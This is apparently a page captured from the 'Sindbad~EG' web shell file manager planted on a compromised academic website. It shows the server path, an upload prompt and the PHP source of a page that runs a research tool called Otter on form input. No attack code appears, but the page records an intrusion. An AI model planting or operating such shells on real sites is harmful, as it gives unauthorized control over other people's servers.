Sindbad~EG File Manager

Current Path : /usr/home/beeson/public_html/michaelbeeson/research/otter-lambda/
Upload File :
Current File : /usr/home/beeson/public_html/michaelbeeson/research/otter-lambda/otter_simple2.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- DW6 -->
<?php include ('include/head.php');
echo "<body onmousemove=\"closesubnav(event);\">\n";
include ('include/body.php'); 
require_once ('include/functions.php'); 

echo "<div class=\"style1\" id=\"pageName\"> 
      <h2>The Output:<img alt=\"small logo\" src=\"logo.jpg\" height=\"59\" width=\"66\"/>  </h2>
      <p>";
$successful = RunOtterByText($_POST['OtterInput']); // $OtterInput comes from the HTML form.
if ( $successful ) {
	print_last($inputfile,$outputfile);
}   
echo "</p></div>";
include ('include/footer.php');
echo "</body>\n</html>\n";
?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists